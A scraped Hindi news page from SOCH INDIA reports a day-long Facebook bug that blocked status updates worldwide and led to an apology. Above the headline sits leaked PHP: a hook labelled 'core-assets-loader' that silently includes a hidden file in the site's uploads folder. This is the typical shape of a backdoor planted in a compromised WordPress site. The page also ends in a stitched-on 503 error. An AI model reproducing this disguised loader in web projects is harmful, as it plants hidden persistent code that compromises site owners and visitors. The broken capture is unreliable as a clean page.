add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); बग से बेदम हुआ फेसबुक, पूरी दुनिया में बड़े-बड़ों को छकाया, मांगनी पड़ी माफी! – SOCH INDIA
Menu

टेक्नोलॉजी
बग से बेदम हुआ फेसबुक, पूरी दुनिया में बड़े-बड़ों को छकाया, मांगनी पड़ी माफी!

nobanner

फेसबुक बुधवार को अब तक की सबसे बड़ी तकनीकी दिक्कत का शिकार हो गया। सुबह से फेसबुक पेज कोई स्टेटस अपडेट नहीं हो रहा था। शुरुआती खबरों के मुताबिक किसी बग के चलते यह समस्या भारत के साथ-साथ अमेरिका, यूरोप, सिंगापुर और आस्ट्रेलिया में भी आई। फेसबुक ने शाम को लोगों को हुई तकनीकी दिक्कत के लिए माफी भी मांग ली।

दरअसल बुधवार को फेसबुक में सुबह से कोई तकनीकी समस्या रही। इसके चलते न तो कोई स्टेटस अपडेट हो रहा था, ना ही कोई कुछ शेयर कर पा रहा था। पहले तो लोगों को लगा कि कुछ देर के लिए कोई टेक्निकल एरर है, लेकिन दिनभर यही हाल रहने पर लोग परेशान हो गए। शाम होते-होते पता चला कि पूरी दुनिया में यह समस्या है। फेसबुक ने शाम को इस तकनीकी दिक्कत के लिए लोगों से माफी मांगी है। कई लोगों ने इस समस्या को ट्विटर पर भी जाहिर किया।

बग से बेदम हुआ फेसबुक, पूरी दुनिया में बड़े-बड़ों को छकाया, मांगनी पड़ी माफी!

फेसबुक में कुछ भी लिखने पर मैसेज आता था, “There was a problem updating your status. Please try again in a few minutes.” बताया जा रहा है कि किसी बग की वजह से फेसबुक में यह तकनीकी खामी आई है। तकनीकी खामी के चलते कई कंपनियां अपने फेसबुक के ऑफिशियल पेज पर कोई भी जानकारी पोस्ट नहीं कर सकीं। इससे कई लोगों का बिजनेस भी प्रभावित हुआ।

दुनिया की कई बड़े पब्लिशर्स के साथ-साथ न्यूज बेवसाइट्स को भी खासी दिक्कतें हुईं। हालांकि कुछ लोगों ने इसका भी जुगाड़ खोज निकाला। उन्होंने मोबाइल से स्टेटस डालकर देखा तो वह तरीका कारगर निकला। फिलहाल देर शाम तक यह समस्या जारी थी।

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.